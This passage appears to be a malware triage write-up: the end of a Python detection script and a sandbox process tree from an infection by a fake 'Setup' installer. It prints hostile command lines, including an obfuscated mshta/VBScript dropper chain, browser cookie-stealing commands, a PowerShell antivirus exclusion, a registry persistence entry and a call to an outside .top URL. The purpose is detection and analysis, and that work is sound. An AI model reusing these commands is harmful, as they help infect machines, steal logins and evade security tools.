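    Proc(r"C:\Windows\SysWOW64\mshta.exe", r'"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )', 3),
    Proc(r"C:\Users\Admin\AppData\Local\Temp\11111.exe", r"C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt", 4),
    Proc(r"C:\Users\Admin\AppData\Local\Temp\22222.exe", r'C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"', 4),
    Proc(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\SBQPAG~1.DLL,s C:\Users\Admin\DOCUME~1\SBQPAG~1.EXE", 3),
    Proc(r"C:\Windows\SysWOW64\RUNDLL32.EXE", r"C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\SBQPAG~1.DLL,ZhNTTzM=", 4),
    Proc(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", r'"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\SBQPAG~1.DLL', 5),
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"[{f.severity:6}] {f.rule:45} depth={f.proc.depth}  {f.proc.cmdline[:70]}")
```

The rules deliberately match on shape rather than on the random file names, so they carry over to the next sample from the same campaign; the one rule keyed on a path (the masquerade check) compares the image column, not the command line, because the command line of the fake lsass.exe is just its own quoted path and says nothing by itself.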
Processes (each entry: depth⤵ image path :: command line, followed by the signatures it triggered)
1⤵ c:\windows\system32\svchost.exe :: c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵ c:\windows\system32\svchost.exe :: c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵ c:\windows\system32\svchost.exe :: c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
   - Suspicious use of AdjustPrivilegeToken
1⤵ c:\windows\system32\svchost.exe :: c:\windows\system32\svchost.exe -k netsvcs -s Browser
   - Suspicious use of SetThreadContext
   - Suspicious use of AdjustPrivilegeToken
  2⤵ C:\Windows\system32\svchost.exe :: C:\Windows\system32\svchost.exe -k SystemNetworkService
     - Drops file in System32 directory
     - Checks processor information in registry
     - Modifies data under HKEY_USERS
     - Modifies registry class
1⤵ c:\windows\system32\svchost.exe :: c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵ c:\windows\system32\svchost.exe :: c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵ c:\windows\system32\svchost.exe :: c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵ c:\windows\system32\svchost.exe :: c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵ c:\windows\system32\svchost.exe :: c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵ c:\windows\system32\svchost.exe :: c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵ c:\windows\system32\svchost.exe :: c:\windows\system32\svchost.exe -k netsvcs -s Schedule
   - Drops file in System32 directory
  2⤵ C:\Users\Admin\AppData\Roaming\afgfbwi :: C:\Users\Admin\AppData\Roaming\afgfbwi
  2⤵ C:\Users\Admin\AppData\Roaming\drgfbwi :: C:\Users\Admin\AppData\Roaming\drgfbwi
  2⤵ C:\Users\Admin\AppData\Roaming\ivgfbwi :: C:\Users\Admin\AppData\Roaming\ivgfbwi
1⤵ C:\Users\Admin\AppData\Local\Temp\Setup (13).exe :: "C:\Users\Admin\AppData\Local\Temp\Setup (13).exe"
   - Checks computer location settings
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of WriteProcessMemory
  2⤵ C:\Users\Admin\Documents\sr1e6evbYvPSPR1h8l_TGwVu.exe :: "C:\Users\Admin\Documents\sr1e6evbYvPSPR1h8l_TGwVu.exe"
     - Executes dropped EXE
     - Suspicious use of SetThreadContext
    3⤵ C:\Users\Admin\Documents\sr1e6evbYvPSPR1h8l_TGwVu.exe :: C:\Users\Admin\Documents\sr1e6evbYvPSPR1h8l_TGwVu.exe
       - Executes dropped EXE
       - Suspicious use of AdjustPrivilegeToken
  2⤵ C:\Users\Admin\Documents\BOa2qC4wspxHZVE1pYCFRlSJ.exe :: "C:\Users\Admin\Documents\BOa2qC4wspxHZVE1pYCFRlSJ.exe"
     - Executes dropped EXE
  2⤵ C:\Users\Admin\Documents\GZCE7lNx2wr8c3GHhY6VpQGL.exe :: "C:\Users\Admin\Documents\GZCE7lNx2wr8c3GHhY6VpQGL.exe"
     - Executes dropped EXE
     - Checks SCSI registry key(s)
     - Suspicious behavior: EnumeratesProcesses
     - Suspicious behavior: MapViewOfSection
  2⤵ C:\Users\Admin\Documents\Mh9JAL13r0v0BmNX5FgEGHKj.exe :: "C:\Users\Admin\Documents\Mh9JAL13r0v0BmNX5FgEGHKj.exe"
     - Executes dropped EXE
     - Checks BIOS information in registry
     - Checks whether UAC is enabled
     - Suspicious use of NtSetInformationThreadHideFromDebugger
     - Suspicious use of AdjustPrivilegeToken
  2⤵ C:\Users\Admin\Documents\9NeY7wDiJGhrvsW_GspXT3lp.exe :: "C:\Users\Admin\Documents\9NeY7wDiJGhrvsW_GspXT3lp.exe"
     - Executes dropped EXE
    3⤵ C:\Windows\SysWOW64\WerFault.exe :: C:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 388
       - Program crash
    3⤵ C:\Windows\SysWOW64\WerFault.exe :: C:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 428
       - Program crash
    3⤵ C:\Windows\SysWOW64\WerFault.exe :: C:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 408
       - Program crash
    3⤵ C:\Windows\SysWOW64\WerFault.exe :: C:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 652
       - Program crash
    3⤵ C:\Windows\SysWOW64\WerFault.exe :: C:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 620
       - Program crash
    3⤵ C:\Windows\SysWOW64\WerFault.exe :: C:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 696
       - Program crash
    3⤵ C:\Windows\SysWOW64\WerFault.exe :: C:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 664
       - Program crash
    3⤵ C:\Windows\SysWOW64\WerFault.exe :: C:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 756
       - Program crash
    3⤵ C:\Users\Admin\Documents\9NeY7wDiJGhrvsW_GspXT3lp.exe :: "C:\Users\Admin\Documents\9NeY7wDiJGhrvsW_GspXT3lp.exe"
       - Modifies data under HKEY_USERS
  2⤵ C:\Users\Admin\Documents\4b5m9Xjbeh4Y9rTVY8V4famT.exe :: "C:\Users\Admin\Documents\4b5m9Xjbeh4Y9rTVY8V4famT.exe"
     - Executes dropped EXE
    3⤵ C:\Windows\SysWOW64\WerFault.exe :: C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 476
       - Suspicious use of NtCreateProcessExOtherParentProcess
       - Program crash
       - Suspicious use of AdjustPrivilegeToken
  2⤵ C:\Users\Admin\Documents\lscm9tUiznW_ZuLtt7SqvXzl.exe :: "C:\Users\Admin\Documents\lscm9tUiznW_ZuLtt7SqvXzl.exe"
     - Executes dropped EXE
     - Suspicious use of SetThreadContext
    3⤵ C:\Users\Admin\Documents\lscm9tUiznW_ZuLtt7SqvXzl.exe :: "C:\Users\Admin\Documents\lscm9tUiznW_ZuLtt7SqvXzl.exe"
       - Executes dropped EXE
  2⤵ C:\Users\Admin\Documents\iHIn3Sm9ab4PCPMlOJLksIeI.exe :: "C:\Users\Admin\Documents\iHIn3Sm9ab4PCPMlOJLksIeI.exe"
     - Executes dropped EXE
  2⤵ C:\Users\Admin\Documents\C5r_nTDxijl_qNhbR__JA8UL.exe :: "C:\Users\Admin\Documents\C5r_nTDxijl_qNhbR__JA8UL.exe"
     - Executes dropped EXE
    3⤵ C:\Windows\SysWOW64\cmd.exe :: "C:\Windows\System32\cmd.exe" /c taskkill /im C5r_nTDxijl_qNhbR__JA8UL.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\C5r_nTDxijl_qNhbR__JA8UL.exe" & del C:\ProgramData\*.dll & exit
      4⤵ C:\Windows\SysWOW64\taskkill.exe :: taskkill /im C5r_nTDxijl_qNhbR__JA8UL.exe /f
         - Kills process with taskkill
      4⤵ C:\Windows\SysWOW64\timeout.exe :: timeout /t 6
         - Loads dropped DLL
         - Delays execution with timeout.exe
  2⤵ C:\Users\Admin\Documents\HvRdJvYAphkP2BshkAtGWhQa.exe :: "C:\Users\Admin\Documents\HvRdJvYAphkP2BshkAtGWhQa.exe"
     - Executes dropped EXE
     - Loads dropped DLL
     - Suspicious use of AdjustPrivilegeToken
    3⤵ C:\Users\Admin\AppData\Local\Temp\ssqq.exe :: "C:\Users\Admin\AppData\Local\Temp\ssqq.exe"
       - Executes dropped EXE
  2⤵ C:\Users\Admin\Documents\GcpFYsjX4UKHyKnErFNxlep5.exe :: "C:\Users\Admin\Documents\GcpFYsjX4UKHyKnErFNxlep5.exe"
     - Executes dropped EXE
     - Checks BIOS information in registry
     - Checks whether UAC is enabled
     - Suspicious use of NtSetInformationThreadHideFromDebugger
     - Suspicious use of AdjustPrivilegeToken
  2⤵ C:\Users\Admin\Documents\j_16kKcB4jVgGPLP0gdjWZI_.exe :: "C:\Users\Admin\Documents\j_16kKcB4jVgGPLP0gdjWZI_.exe"
     - Executes dropped EXE
     - Suspicious use of SetThreadContext
    3⤵ C:\Users\Admin\Documents\j_16kKcB4jVgGPLP0gdjWZI_.exe :: C:\Users\Admin\Documents\j_16kKcB4jVgGPLP0gdjWZI_.exe
       - Executes dropped EXE
    3⤵ C:\Users\Admin\Documents\j_16kKcB4jVgGPLP0gdjWZI_.exe :: C:\Users\Admin\Documents\j_16kKcB4jVgGPLP0gdjWZI_.exe
       - Executes dropped EXE
       - Suspicious use of AdjustPrivilegeToken
  2⤵ C:\Users\Admin\Documents\YtTnmDnMr8kYIzzObFT55Rkd.exe :: "C:\Users\Admin\Documents\YtTnmDnMr8kYIzzObFT55Rkd.exe"
     - Executes dropped EXE
    3⤵ C:\Windows\SysWOW64\cmd.exe :: "C:\Windows\System32\cmd.exe" /c taskkill /im "YtTnmDnMr8kYIzzObFT55Rkd.exe" /f & erase "C:\Users\Admin\Documents\YtTnmDnMr8kYIzzObFT55Rkd.exe" & exit
      4⤵ C:\Windows\SysWOW64\taskkill.exe :: taskkill /im "YtTnmDnMr8kYIzzObFT55Rkd.exe" /f
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken
  2⤵ C:\Users\Admin\Documents\xRxZGAoA5TFUm46yqDqWyLKe.exe :: "C:\Users\Admin\Documents\xRxZGAoA5TFUm46yqDqWyLKe.exe"
     - Executes dropped EXE
     - Loads dropped DLL
     - Suspicious use of AdjustPrivilegeToken
    3⤵ C:\Users\Admin\Documents\xRxZGAoA5TFUm46yqDqWyLKe.exe :: "C:\Users\Admin\Documents\xRxZGAoA5TFUm46yqDqWyLKe.exe"
       - Executes dropped EXE
       - Loads dropped DLL
       - Drops file in Windows directory
       - Suspicious use of AdjustPrivilegeToken
      4⤵ C:\Windows\System32\cmd.exe :: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\G0PS2zVnoL.bat"
        5⤵ C:\Windows\system32\chcp.com :: chcp 65001
        5⤵ C:\Windows\system32\w32tm.exe :: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
           - Executes dropped EXE
           - Loads dropped DLL
           - Suspicious use of FindShellTrayWindow
        5⤵ C:\Windows\System32\DscTimer\lsass.exe :: "C:\Windows\System32\DscTimer\lsass.exe"
           - Suspicious use of SetWindowsHookEx
  2⤵ C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe :: "C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe"
     - Executes dropped EXE
    3⤵ C:\Windows\SysWOW64\mshta.exe :: "C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
  2⤵ C:\Users\Admin\Documents\xSrL1QRuFcmsVaGKJ6KvkP1I.exe :: "C:\Users\Admin\Documents\xSrL1QRuFcmsVaGKJ6KvkP1I.exe"
     - Executes dropped EXE
     - Suspicious use of SetThreadContext
     - Suspicious use of AdjustPrivilegeToken
    3⤵ C:\Users\Admin\Documents\xSrL1QRuFcmsVaGKJ6KvkP1I.exe :: "C:\Users\Admin\Documents\xSrL1QRuFcmsVaGKJ6KvkP1I.exe"
C:\Users\Admin\Documents\mgBOJpLraGK2Wlg_GsNS8POH.exe"C:\Users\Admin\Documents\mgBOJpLraGK2Wlg_GsNS8POH.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\CW9iZUPnTLWFDj2aH5MN_4dK.exe"C:\Users\Admin\Documents\CW9iZUPnTLWFDj2aH5MN_4dK.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\zGFs3qgZ52GcHMqEBczEQ9x9.exe"C:\Users\Admin\Documents\zGFs3qgZ52GcHMqEBczEQ9x9.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
C:\Users\Admin\Documents\tuuN5KFkdh6HTJMT2aKyIIjj.exe"C:\Users\Admin\Documents\tuuN5KFkdh6HTJMT2aKyIIjj.exe"2⤵
- Executes dropped EXE
C:\Users\Admin\Documents\tuuN5KFkdh6HTJMT2aKyIIjj.exe"C:\Users\Admin\Documents\tuuN5KFkdh6HTJMT2aKyIIjj.exe" -q3⤵
- Executes dropped EXE
C:\Users\Admin\Documents\VQF2oO7acvvovPhrwKWLMcyD.exe"C:\Users\Admin\Documents\VQF2oO7acvvovPhrwKWLMcyD.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
C:\Users\Admin\Documents\sbqPAgkI_05eWSEnnOqyIFuT.exe"C:\Users\Admin\Documents\sbqPAgkI_05eWSEnnOqyIFuT.exe"2⤵
- Executes dropped EXE
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\SBQPAG~1.DLL,s C:\Users\Admin\DOCUME~1\SBQPAG~1.EXE3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in Program Files directory
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\SBQPAG~1.DLL,ZhNTTzM=4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\SBQPAG~1.DLL5⤵
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\SBQPAG~1.DLL,dlQhRA==5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 318046⤵
- Modifies Internet Explorer settings
C:\Windows\system32\ctfmon.exectfmon.exe7⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp60CB.tmp.ps1"5⤵
- Executes dropped EXE
C:\Users\Admin\Documents\ySzhlkxv6lvVdaZGAMZc3MjG.exe"C:\Users\Admin\Documents\ySzhlkxv6lvVdaZGAMZc3MjG.exe"2⤵
- Executes dropped EXE
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 6603⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 6963⤵
- Program crash
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 6603⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 6923⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 10763⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
C:\Users\Admin\Documents\3bddbg9jWr7Ig8wwsIl8rRbl.exe"C:\Users\Admin\Documents\3bddbg9jWr7Ig8wwsIl8rRbl.exe"2⤵
- Executes dropped EXE
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\Xq_nEPqQVaJIj4O11jOJH7Fl.exe") do taskkill -IM "%~nXW" -f1⤵
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu92⤵
- Executes dropped EXE
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )3⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f4⤵
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE3⤵
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "Xq_nEPqQVaJIj4O11jOJH7Fl.exe" -f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
C:\Users\Admin\AppData\Local\Temp\is-H19HE.tmp\3bddbg9jWr7Ig8wwsIl8rRbl.tmp"C:\Users\Admin\AppData\Local\Temp\is-H19HE.tmp\3bddbg9jWr7Ig8wwsIl8rRbl.tmp" /SL5="$2025C,138429,56832,C:\Users\Admin\Documents\3bddbg9jWr7Ig8wwsIl8rRbl.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
C:\Users\Admin\AppData\Local\Temp\is-PJAK3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PJAK3.tmp\Setup.exe" /Verysilent2⤵
- Executes dropped EXE
- Drops file in Program Files directory
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"3⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im runvd.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe" & del C:\ProgramData\*.dll & exit4⤵
C:\Windows\SysWOW64\taskkill.exetaskkill /im runvd.exe /f5⤵
- Kills process with taskkill
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent3⤵
C:\Users\Admin\AppData\Local\Temp\is-62PIN.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-62PIN.tmp\Inlog.tmp" /SL5="$20312,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
C:\Users\Admin\AppData\Local\Temp\is-NQLVI.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-NQLVI.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7215⤵
C:\Users\Admin\AppData\Local\Temp\is-UV2V5.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-UV2V5.tmp\Setup.tmp" /SL5="$2047E,17344747,721408,C:\Users\Admin\AppData\Local\Temp\is-NQLVI.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7216⤵
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-40EIF.tmp\{app}\microsoft.cab -F:* %ProgramData%7⤵
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-40EIF.tmp\{app}\microsoft.cab -F:* C:\ProgramData8⤵
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f7⤵
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f8⤵
C:\Users\Admin\AppData\Local\Temp\is-40EIF.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-40EIF.tmp\{app}\vdi_compiler"7⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-40EIF.tmp\{app}\vdi_compiler.exe"8⤵
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Suspicious use of SendNotifyMessage
C:\Windows\SysWOW64\PING.EXEping localhost -n 49⤵
- Runs ping.exe
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7217⤵
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"7⤵
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629548201 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"4⤵
- Enumerates connected drives
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"3⤵
C:\Users\Admin\AppData\Local\Temp\is-IVF63.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-IVF63.tmp\MediaBurner2.tmp" /SL5="$1033E,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"4⤵
C:\Users\Admin\AppData\Local\Temp\is-V6PHP.tmp\ultradumnibour.exe"C:\Users\Admin\AppData\Local\Temp\is-V6PHP.tmp\ultradumnibour.exe" /S /UID=burnerch25⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
